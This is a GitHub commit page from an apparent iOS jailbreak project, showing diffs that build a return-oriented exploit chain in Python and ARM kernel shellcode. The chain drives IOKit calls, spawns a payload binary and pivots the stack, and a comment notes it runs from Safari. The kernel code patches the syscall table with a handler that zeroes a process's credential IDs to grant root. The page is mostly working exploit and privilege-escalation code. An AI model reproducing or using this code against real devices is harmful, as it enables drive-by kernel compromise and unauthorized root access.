Permalink
Browse files

starstuff

  • Loading branch information...
1 parent de3ea5f commit 04a0e61153292f98bd10b8cfe2f4e2bda68761e7 @comex committed May 2, 2011
Showing with 222 additions and 407 deletions.
  1. +3 −0 .gitmodules
  2. +25 −20 catalog/catalog.py
  3. +25 −15 catalog/kcode.S
  4. +1 −1 data
  5. +0 −65 datautils/apply_patchfile.c
  6. +0 −44 datautils/lambda.h
  7. +0 −193 datautils/make_kernel_patchfile.c
  8. +16 −14 install/install.m
  9. +53 −32 locutus/locutus.c
  10. +24 −4 locutus/locutus_server.m
  11. +38 −16 make.py
  12. +3 −2 nullfs/null.h
  13. +1 −1 nullfs/null_vfsops.c
  14. +14 −0 starstuff/lunchd
  15. +19 −0 starstuff/mtree
View
@@ -4,3 +4,6 @@
[submodule "datautils0"]
path = datautils0
url = git://github.com/comex/datautils0.git
+[submodule "white"]
+ path = white
+ url = git://github.com/comex/white.git
View
@@ -31,19 +31,26 @@ def add_lib(short, path):
dmini.cur.add_lib(short, path)
lib_paths.add(path)
+debugging = True
+
def dbg_result():
- if True:
+ if debugging:
result, resultp = stackunkpair()
store_r0_to(resultp)
back = sys._getframe().f_back
- funcall('_printf', ptr('Result for %s:%d was %%08x\n' % (back.f_code.co_filename, back.f_lineno), True), result)
+ if mode == 'two':
+ funcall('_fprintf', console, ptr('Result for %s:%d was %%08x\n' % (back.f_code.co_filename, back.f_lineno), True), result, load_r0=True)
+ else:
+ funcall('_syslog', 0, ptr('Result for %s:%d was %%08x' % (back.f_code.co_filename, back.f_lineno), True), result)
dmini.init(cachefile, True)
dmini.init(kernfile, False)
+sysent = dmini.cur.find_basic('- 00 10 86 00') + 4
+
code_addr = 0x80000400 # XXX
-weirdfile = dmini.Connection('kcode.o', rw=True).relocate(dmini.cur, code_addr).nth_segment(0)[:-4]
+weirdfile = dmini.Connection('kcode.o', rw=True).relocate(dmini.cur, code_addr).nth_segment(0)[:-8]
count = 0
stuff = ''
while True:
@@ -56,7 +63,7 @@ def dbg_result():
continue
stuff += I(addr, len(data)) + data
count += 1
-weirdfile = pointed(weirdfile + I(count) + stuff)
+weirdfile = pointed(weirdfile + I(sysent, count) + stuff)
def mov_r3_r7():
# push {r1, r3, r6, r7, lr}
@@ -102,15 +109,18 @@ def wrap(num):
init('R4', 'R5', 'PC')
make_r7_avail()
set_sp_to_sp()
-else:
- init('R8', 'R10', 'R11', 'R4', 'R5', 'R6', 'R7', 'PC')
-make_avail()
-
-if mode == 'dejavu':
+ make_avail()
load_r0_from(reloc(0xe, 0x558))
load_r0_r0()
zlocutusp, zlocutuspp = stackunkpair()
store_r0_to(zlocutuspp)
+else:
+ init('R8', 'R10', 'R11', 'R4', 'R5', 'R6', 'R7', 'PC')
+ make_avail()
+ if debugging:
+ console = ptrI(0)
+ funcall('_fopen', ptr('/dev/console', True), ptr('a', True))
+ store_r0_to(console)
funcall('_mach_task_self')
task_self, task_self_p = stackunkpair()
@@ -135,14 +145,16 @@ def wrap(num):
# XXX is this necessary? it's from star
funcall('iokit._IOKitWaitQuiet', 0, ptrI(0, 0, 0))
-#funcall('iokit._IOServiceMatching', ptr('AppleRGBOUT', True))
-funcall('iokit._IOServiceMatching', ptr('AppleCLCD', True))
+# XXX this won't work at boot because there is no notify!
+funcall('iokit._IOServiceMatching', ptr('AppleRGBOUT', True))
+#funcall('iokit._IOServiceMatching', ptr('AppleCLCD', True))
matching, matchingp = stackunkpair()
store_r0_to(matchingp)
funcall('iokit._IOServiceGetMatchingService', 0, matching)
connect = ptrI(0)
funcall('iokit._IOServiceOpen', None, task_self, 0, connect); dbg_result()
+# XXX In Safari, I need to kill this
funcall('iokit._IOConnectCallScalarMethod', connect, 21, ptrI(0xeeeeeeee, 0xeeeeeeee), 2, 0, 0, load_r0=True); dbg_result()
funcall('iokit._IOConnectCallStructMethod', connect, 5, ptr(transaction), len(transaction), 0, 0, load_r0=True); dbg_result()
@@ -167,21 +179,14 @@ def wrap(num):
fd, fdp = stackunkpair()
store_r0_to(fdp)
#dbg_result()
- funcall('_write', None, locutusp, reloc(0xb, 0))
+ funcall('_write', None, locutusp, reloc(0xa, 0))
dbg_result()
funcall('_close', fd)
dbg_result()
- funcall('_posix_spawn', 0x11000000, locutus_str, 0, 0, ptrI(locutus_str, 0), zerop)
+ funcall('_posix_spawn', 0, locutus_str, 0, 0, zerop, zerop)
dbg_result()
-# XXX vnode enforce
-
if mode == 'dejavu':
- funcall('_geteuid')
- funcall('_setuid', None); dbg_result()
-
- #funcall('_printf', ptr('done with shellcode\n', True))
-
set_r0_to(1337)
fancy_set_sp_to(reloc(0xe, 0x60c)) # offset determined by experiment
else:
View
@@ -7,12 +7,12 @@ start:
adr r0, inspiring
bl _IOLog
- mov r8, #0; b end
+ #mov r8, #0; b end; foo
adr r5, stuff
ldr r8, count
-pf_loop:
+pf_loop:
ldm r5, {r0, r2}
add r1, r5, #8
bl _memcpy
@@ -38,26 +38,36 @@ end:
add r0, r6, #0x220
str r0, [r6, #0x220]
str r0, [r6, #0x224]
-#if 0
-
- ;# stop and start (94, 93)
- ldr r5, [r6]
- mov r0, r6
- ldr r1, [r6, #0x294]
- mov lr, pc
- ldr pc, [r5, #(94*4)]
-
- mov r0, r6
- ldr r1, [r6, #0x294]
- mov lr, pc
- ldr pc, [r5, #(93*4)]
+
+#ifdef DEJAVU
+ ldr r0, sysent
+ adr r1, syscall_0
+ str r1, [r0, #0x4]
#endif
pop {r8, r10, r11}
pop {r4-r7, pc}
+#ifdef DEJAVU
+syscall_0:
+ push {lr}
+ bl _proc_ucred
+ mov r1, #0
+ str r1, [r0, #0xc]
+ ldr r0, [r0, #0x6c]
+ cmp r0, #0
+ strne r1, [r0, #8]
+ ldr r0, sysent
+ ldr r1, [r0, #0xc4]
+ str r1, [r0, #0x4]
+ pop {pc}
+#endif
+
inspiring: .asciz "I exist!\n"
.align 2
+sysent: .long 0
count: .long 0
stuff:
+
+ #patch("sysent", 0, uint32_t, {find_int32(b_macho_segrange(binary, "__DATA"), 0x861000, true) + 4});
2 data
Submodule data updated 13 files
+8 −7 Makefile
+32 −17 Makefile.common
+33 −60 binary.c
+3 −2 binary.h
+71 −47 common.c
+2 −2 common.h
+0 −1 find.c
+0 −15 findtest.c
+21 −0 ldid_wrapper
+1 −18 link.c
+0 −2 link.h
+36 −48 running_kernel.c
+5 −1 running_kernel.h
@@ -1,65 +0,0 @@
-#include <data/common.h>
-#include <data/binary.h>
-#include <assert.h>
-
-int main(int argc, char **argv) {
- struct binary binary;
- b_init(&binary);
- mode_t mode;
- prange_t kernel = load_file(argv[1], true, &mode);
- b_prange_load_macho(&binary, kernel, argv[1]);
-
- int patchfd = open(argv[2], O_RDONLY);
- if(patchfd == -1) {
- edie("could not open patchfd");
- }
-
- while(1) {
- uint32_t name_len;
- ssize_t result = read(patchfd, &name_len, sizeof(name_len));
- if(result == 0) break;
- assert(result == sizeof(name_len));
- assert(name_len < 128);
- char *name = malloc(name_len + 1);
- assert(read(patchfd, name, name_len) == (ssize_t) name_len);
- name[name_len] = 0;
-
- addr_t addr;
- assert(read(patchfd, &addr, sizeof(addr)) == sizeof(addr));
-
- uint32_t size;
- assert(read(patchfd, &size, sizeof(size)) == sizeof(size));
- assert(size < 0x1000000);
-
- void *stuff = malloc(size);
- assert(read(patchfd, stuff, size) == (ssize_t) size);
-
- if(addr == 0) goto skip;
- if(name[0] == '+') goto skip;
-
- if(argv[4] && !strcmp(argv[4], "-i")) {
- retry:
- printf("%s [y/n] ", name);
- fflush(stdout);
- char buf[3];
- if(!fgets(buf, sizeof(buf), stdin)) abort();
- if(!strcmp(buf, "n\n")) {
- goto skip;
- } else if(strcmp(buf, "y\n")) {
- goto retry;
- }
- } else {
- printf("%s\n", name);
- }
-
- memcpy((char *) kernel.start + range_to_off_range((range_t) {&binary, addr, size}).start, stuff, size);
-
- skip:
-
- free(name);
- free(stuff);
- }
-
- store_file(kernel, argv[3], mode);
- return 0;
-}
View
@@ -1,44 +0,0 @@
-#pragma once
-
-/* Example:
-
- int multiplier = 5;
- DECL_LAMBDA(l, int, (int a), {
- return a * multiplier;
- })
- assert(l.func(l.arg, 4) == 20);
-
- The point of this is to work on both iOS, where GCC inline
- functions don't work, and Linux, where Apple blocks generally
- aren't available.
-*/
-
-#ifdef __BLOCKS__
-struct _blk {
- void *isa;
- int flags;
- int reserved;
- void *invoke;
-};
-#define LAMBDA_BODY(typ, ret, args, body) \
- ({ union { \
- ret (^blk) args; \
- struct _blk *_blk; \
- void *vp; \
- } u = { ^ret args body }; \
- (typ) {u._blk->invoke, u.vp}; \
- })
-#else
-#define LAMBDA_BODY_(typ, ret, args, body) \
- ({ ret func args body; \
- (typ) {&func, 0}; \
- })
-#define LAMBDA_BODY(typ, ret, args, body) \
- LAMBDA_BODY_(typ, ret, LAMBDA_UNPAREN args, body)
-#endif
-#define LAMBDA_UNPAREN(args...) (void *_lambda_ignored, ##args)
-#define DECL_LAMBDA(name, ret, args, body) \
- struct { \
- ret (*func) LAMBDA_UNPAREN args; \
- void *arg; \
- } name = LAMBDA_BODY(typeof(name), ret, args, body);
Oops, something went wrong.

0 comments on commit 04a0e61

Please sign in to comment.